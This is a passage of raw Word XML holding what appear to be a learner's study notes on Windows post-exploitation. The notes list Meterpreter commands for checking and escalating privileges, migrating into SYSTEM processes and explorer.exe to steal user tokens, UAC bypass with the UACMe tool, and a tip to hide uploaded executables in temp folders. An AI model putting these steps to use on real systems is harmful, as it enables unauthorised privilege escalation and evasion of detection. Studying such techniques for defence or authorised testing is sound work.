          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005201CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">On the listener </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005201CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005201CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048BC85C" w14:textId="54D3E82B" w:rsidR="005201CA" w:rsidRDefault="007A5E94">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20EAB4CC" w14:textId="56BAC5F8" w:rsidR="007A5E94" w:rsidRDefault="007A5E94">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68629A52" w14:textId="71137C51" w:rsidR="007A5E94" w:rsidRDefault="007A5E94">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getprivs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D117D09" w14:textId="3F7B865E" w:rsidR="007A5E94" w:rsidRDefault="007A5E94">
      <w:r>
        <w:t># elevated privilege now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77544519" w14:textId="7CE438DC" w:rsidR="007A5E94" w:rsidRDefault="007A5E94">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Ps</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="697BF586" w14:textId="62C3BC09" w:rsidR="007A5E94" w:rsidRDefault="007A5E94">
      <w:r>
        <w:t xml:space="preserve"># we can migrate to any process with (NT authority system) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB0568C" w14:textId="2CF41EEE" w:rsidR="007A5E94" w:rsidRDefault="007A5E94">
      <w:r>
        <w:t>Migrate (PID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15980F5D" w14:textId="0F2595EC" w:rsidR="007A5E94" w:rsidRDefault="007A5E94">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03D2E8DD" w14:textId="77777777" w:rsidR="000E1671" w:rsidRDefault="000E1671"/>
    <w:p w14:paraId="39B9739F" w14:textId="77777777" w:rsidR="00F32663" w:rsidRDefault="00F32663"/>
    <w:p w14:paraId="4EB7B3C7" w14:textId="77777777" w:rsidR="000E1671" w:rsidRDefault="000E1671"/>
    <w:p w14:paraId="7711907F" w14:textId="77777777" w:rsidR="000E1671" w:rsidRDefault="000E1671"/>
    <w:p w14:paraId="5CC66A8B" w14:textId="77777777" w:rsidR="00051210" w:rsidRDefault="00051210"/>
    <w:p w14:paraId="0EF5001D" w14:textId="77777777" w:rsidR="00051210" w:rsidRDefault="00051210"/>
    <w:p w14:paraId="2CC94574" w14:textId="77777777" w:rsidR="00C35051" w:rsidRDefault="00C35051"/>
    <w:p w14:paraId="2D5B5CB4" w14:textId="77777777" w:rsidR="00C35051" w:rsidRDefault="00C35051"/>
    <w:p w14:paraId="49126D38" w14:textId="77777777" w:rsidR="00C35051" w:rsidRDefault="00C35051"/>
    <w:p w14:paraId="68515C54" w14:textId="77777777" w:rsidR="00C35051" w:rsidRDefault="00C35051"/>
    <w:p w14:paraId="58019281" w14:textId="77777777" w:rsidR="00C35051" w:rsidRDefault="00C35051"/>
    <w:p w14:paraId="6DAF17AE" w14:textId="75C811E6" w:rsidR="00C35051" w:rsidRDefault="00C35051"/>
    <w:p w14:paraId="14729886" w14:textId="32181655" w:rsidR="00C35051" w:rsidRDefault="00C35051">
      <w:r>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B5299F" w14:textId="18D074FD" w:rsidR="00C35051" w:rsidRPr="00C35051" w:rsidRDefault="00C35051" w:rsidP="00C35051">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35051">
        <w:lastRenderedPageBreak/>
        <w:t>UAC = Windows pop-up asking permission for admin rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A7203" w14:textId="6B03A0A6" w:rsidR="00C35051" w:rsidRPr="00C35051" w:rsidRDefault="00C35051" w:rsidP="00C35051">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35051">
        <w:t>UAC bypass = skipping that pop-up and still getting admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C487DF" w14:textId="573E864B" w:rsidR="00C35051" w:rsidRPr="00C35051" w:rsidRDefault="00C35051" w:rsidP="00C35051">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C35051">
        <w:t>UACMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C35051">
        <w:t xml:space="preserve"> = a tool with many tricks to do that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8D045D" w14:textId="77777777" w:rsidR="00F3670B" w:rsidRPr="00F3670B" w:rsidRDefault="00F3670B" w:rsidP="00F3670B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3670B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F3670B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UACMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F3670B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ED2B58" w14:textId="77777777" w:rsidR="00F3670B" w:rsidRPr="00F3670B" w:rsidRDefault="00F3670B" w:rsidP="00F3670B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F3670B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UACMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F3670B">
        <w:t xml:space="preserve"> is a well-known tool made by a security researcher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA49459" w14:textId="77777777" w:rsidR="00F3670B" w:rsidRPr="00F3670B" w:rsidRDefault="00F3670B" w:rsidP="00F3670B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3670B">
        <w:t xml:space="preserve">It contains many different </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3670B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3670B">
        <w:t xml:space="preserve"> to bypass UAC on Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DC222D" w14:textId="77777777" w:rsidR="00F3670B" w:rsidRPr="00F3670B" w:rsidRDefault="00F3670B" w:rsidP="00F3670B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3670B">
        <w:t>Think of it like a “toolbox” of exploits against the UAC system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C5F7B8" w14:textId="77777777" w:rsidR="00C35051" w:rsidRDefault="00C35051"/>
    <w:p w14:paraId="3F3BF888" w14:textId="63913BBB" w:rsidR="00DF2375" w:rsidRDefault="00DF2375">
      <w:r>
        <w:t xml:space="preserve">If we have the account that is part of local </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>administrator</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then we will be able to bypass the UAC otherwise we will </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>no</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be able to bypass it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773D765F" w14:textId="77777777" w:rsidR="00DF2375" w:rsidRDefault="00DF2375"/>
    <w:p w14:paraId="1FC6C179" w14:textId="45B24FFB" w:rsidR="00F119BB" w:rsidRDefault="00F119BB">
      <w:r>
        <w:t>Integrity levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4066C766" w14:textId="18D6A31B" w:rsidR="00F119BB" w:rsidRDefault="00F119BB">
      <w:r>
        <w:t xml:space="preserve">Low to high </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCB9A8" w14:textId="77777777" w:rsidR="00F119BB" w:rsidRDefault="00F119BB"/>
    <w:p w14:paraId="61C26F73" w14:textId="465B66FA" w:rsidR="00F119BB" w:rsidRDefault="00F119BB">
      <w:r>
        <w:t>High is difficult to bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5849CE00" w14:textId="77777777" w:rsidR="00815DFB" w:rsidRDefault="00815DFB"/>
    <w:p w14:paraId="5C17C94F" w14:textId="77777777" w:rsidR="00815DFB" w:rsidRPr="00815DFB" w:rsidRDefault="00815DFB" w:rsidP="00815DFB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815DFB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00815DFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Why explorer.exe is important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1792C98C" w14:textId="77777777" w:rsidR="00815DFB" w:rsidRPr="00815DFB" w:rsidRDefault="00815DFB" w:rsidP="00815DFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00815DFB">
        <w:t xml:space="preserve">On Windows, explorer.exe is usually started by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00815DFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>logged-in user</w:t>
      </w:r>
      <w:r w:rsidRPr="00815DFB">
        <w:t xml:space="preserve"> (the desktop session).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754ABE46" w14:textId="77777777" w:rsidR="00815DFB" w:rsidRPr="00815DFB" w:rsidRDefault="00815DFB" w:rsidP="00815DFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00815DFB">
        <w:t xml:space="preserve">If you inject into or migrate your Meterpreter session into explorer.exe, you’re running inside the </w:t>
      </w:r>
      <w:r w:rsidRPr="00815DFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user’s desktop session</w:t>
      </w:r>
      <w:r w:rsidRPr="00815DFB">
        <w:t>, which can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F726908" w14:textId="77777777" w:rsidR="00815DFB" w:rsidRPr="00815DFB" w:rsidRDefault="00815DFB" w:rsidP="00815DFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00815DFB">
        <w:t>Bypass some restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73343D6E" w14:textId="77777777" w:rsidR="00815DFB" w:rsidRPr="00815DFB" w:rsidRDefault="00815DFB" w:rsidP="00815DFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00815DFB">
        <w:t>Allow interaction with GUI applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3625A9E2" w14:textId="77777777" w:rsidR="00815DFB" w:rsidRPr="00815DFB" w:rsidRDefault="00815DFB" w:rsidP="00815DFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00815DFB">
        <w:t>Let you steal tokens from the logged-in user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A0EC03" w14:textId="77777777" w:rsidR="000E1671" w:rsidRDefault="000E1671"/>
    <w:p w14:paraId="577B63C3" w14:textId="19498C88" w:rsidR="00815DFB" w:rsidRDefault="000E1671">
      <w:r>
        <w:t>Pkgmgr.exe is used in the window to download the executables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2012D651" w14:textId="77777777" w:rsidR="000E1671" w:rsidRDefault="000E1671"/>
    <w:p w14:paraId="37A2DDF7" w14:textId="4EFA5986" w:rsidR="005201CA" w:rsidRDefault="005201CA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Temp location </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>best</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>executable ,never</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> upload exe to the directory which are frequently used by the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1562A5FE" w14:textId="77777777" w:rsidR="005201CA" w:rsidRDefault="005201CA"/>
    <w:p w14:paraId="416BDD6B" w14:textId="77777777" w:rsidR="005201CA" w:rsidRDefault="005201CA"/>
    <w:sectPr w:rsidR="00520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BA4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="28E07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17849"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB3C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5600D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CA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15EB9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04267E0C"/>
    <w:lvl w:ilvl="0" w:tplc="F8381B9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819640">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="97067740">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="908229794">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="596326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34"/>
    <w:rsid w:val="00044891"/>
    <w:rsid w:val="00051210"/>
    <w:rsid w:val="000E1671"/>
    <w:rsid w:val="00127ED9"/>
    <w:rsid w:val="001D657E"/>
    <w:rsid w:val="00240366"/>
    <w:rsid w:val="002F7082"/>
    <w:rsid w:val="00380A69"/>
    <w:rsid w:val="003F7CEE"/>
    <w:rsid w:val="00467458"/>
    <w:rsid w:val="005201CA"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00601A4F"/>
    <w:rsid w:val="00632A0A"/>
    <w:rsid w:val="007A5E94"/>
    <w:rsid w:val="00815DFB"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00B01206"/>
    <w:rsid w:val="00B82539"/>
    <w:rsid w:val="00BA1F91"/>
    <w:rsid w:val="00C35051"/>
    <w:rsid w:val="00C92E82"/>
    <w:rsid w:val="00D84246"/>
    <w:rsid w:val="00DF2375"/>
    <w:rsid w:val="00EE5934"/>
    <w:rsid w:val="00F119BB"/>
    <w:rsid w:val="00F2719F"/>
    <w:rsid w:val="00F32663"/>
    <w:rsid w:val="00F3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47F6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E5CFC07B-D040-4FAF-9EBF-90AFB2ED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9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74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47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-28T06:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-28T09:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>